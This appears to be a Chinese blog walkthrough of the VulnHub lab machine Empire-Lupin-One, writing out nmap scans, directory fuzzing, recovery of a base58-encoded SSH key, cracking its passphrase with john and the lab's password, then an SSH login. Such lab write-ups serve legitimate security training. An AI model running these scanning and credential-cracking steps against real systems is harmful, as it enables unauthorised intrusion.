vulnhub Empire-Lupin-One靶机

搭建靶机;拖进来就行

扫描靶机IP

nmap -O 192.168.47.130

1.信息收集

nmap -p- 192.168.47.133
nmap -sC -sV -p 22,80 192.168.47.133 -oN nmap.log

目录扫描

gobuster dir -w 字典目录 -u 目标
gobuster dir -w zi.txt -u http://192.168.47.133/

2.寻找薄弱点

查看robots.txt文件,发现一个不可访问的~myfiles文件,下面应该有其他文件,模糊测试下

wfuzz -c -w zi.txt -u http://192.168.47.133/~FUZZ | grep -v 404

扫到一个 secret

3.解密

得到一封信重要的有:1.存在隐藏文件 2.用fasttrack字典爆破密码 3.用户名icex64

ffuf -u 'http://192.168.47.133/~secret/.FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub,.html,.bak -mc 200

直接去访问一下这个文件mysecret.txt

去解密一下

base64解密不出来;base58可以;这就是登录系统的私钥

创建两个文档;2.txt写我们解密后的数据;1.txt空的

我们可以利用kali自带的ssh2john进行密码的暴力破解

把我们解密后的数据写到1.txt

ssh2john 2.txt > 1.txt
john --wordlist=/usr/share/wordlists/fasttrack.txt 1.txt
得到密码P@55w0rd!
用户名:icex64
密码:P@55w0rd!

4.登录系统

#如果出现报错//报错的原因是Linux和Windows的换行符不一致
chmod 600 key	#提升权限
dos2unix key	#改变格式
#在连接
ssh icex64@192.168.47.133 -i key

成功获取flag

相关推荐
燕雀安知鸿鹄之志哉.2 小时前
攻防世界 easyphp
安全·web安全·网络安全
老鑫安全培训3 小时前
从安全角度看 SEH 和 VEH
java·网络·安全·网络安全·系统安全·安全威胁分析
网络安全工程师老王5 小时前
vulnhub靶机billu_b0x精讲
网络安全·信息安全·渗透测试
cr.sheeper5 小时前
empire靶机
网络安全·vulnhub
anddddoooo7 小时前
Kerberoasting 离线爆破攻击
网络·数据库·安全·microsoft·网络安全
为几何欢7 小时前
【hackmyvm】deba靶机wp
网络安全·渗透·hackmyvm·hmv
为几何欢8 小时前
【hackmyvm】hacked靶机wp
网络安全·渗透·hackmyvm·hmv
A5rZ13 小时前
CTF-RE: 安卓逆向 + 加密算法分析爆破 [第一届国城杯 round] 赛后学习
网络安全·安卓逆向·逆向工程
HackKong16 小时前
Python与黑客技术
网络·python·web安全·网络安全·php